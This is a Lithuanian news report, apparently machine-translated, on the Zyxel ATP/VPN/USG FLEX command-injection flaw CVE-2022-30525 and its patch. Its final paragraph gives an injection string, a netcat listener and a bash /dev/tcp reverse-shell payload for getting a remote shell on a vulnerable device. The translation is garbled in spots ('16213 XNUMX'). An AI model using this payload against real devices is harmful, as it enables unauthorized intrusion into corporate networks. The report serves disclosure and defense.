„Zyxel“ ugniasienės pažeidžiamumas, leidžiantis vykdyti kodą be autentifikavimo

ATP, VPN ir USG FLEX serijos Zyxel įrenginiuose, skirtuose organizuoti ugniasienės, IDS ir VPN veikimą įmonėse, buvo nustatytas kritinis pažeidžiamumas (CVE-2022-30525), leidžiantis išoriniam užpuolikui vykdyti kodą įrenginį be vartotojo teisių be autentifikavimo. Kad galėtų įvykdyti ataką, užpuolikas turi turėti galimybę siųsti užklausas į įrenginį naudodamas HTTP/HTTPS protokolą. „Zyxel“ ištaisė pažeidžiamumą ZLD 5.30 programinės įrangos naujinime. „Shodan“ tarnybos duomenimis, šiuo metu pasauliniame tinkle yra 16213 XNUMX potencialiai pažeidžiamų įrenginių, kurie priima užklausas per HTTP/HTTPS.

Operacija atliekama siunčiant specialiai sukurtas komandas žiniatinklio tvarkyklei /ztp/cgi-bin/handler, pasiekiamas be autentifikavimo. Problemą sukelia netinkamo užklausos parametrų išvalymo trūkumas, kai sistemoje vykdomos komandos naudojant os.system iškvietimą, naudojamą lib_wan_settings.py bibliotekoje ir vykdomą apdorojant setWanPortSt operaciją.

Pavyzdžiui, užpuolikas gali perduoti eilutę „; ping 192.168.1.210;" dėl kurio sistemoje bus vykdoma komanda „ping 192.168.1.210“. Norėdami pasiekti komandų apvalkalą, galite paleisti „nc -lvnp 1270“ savo sistemoje ir inicijuoti atvirkštinį ryšį išsiųsdami užklausą į įrenginį su „; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Šaltinis: opennet.ru

Добавить комментарий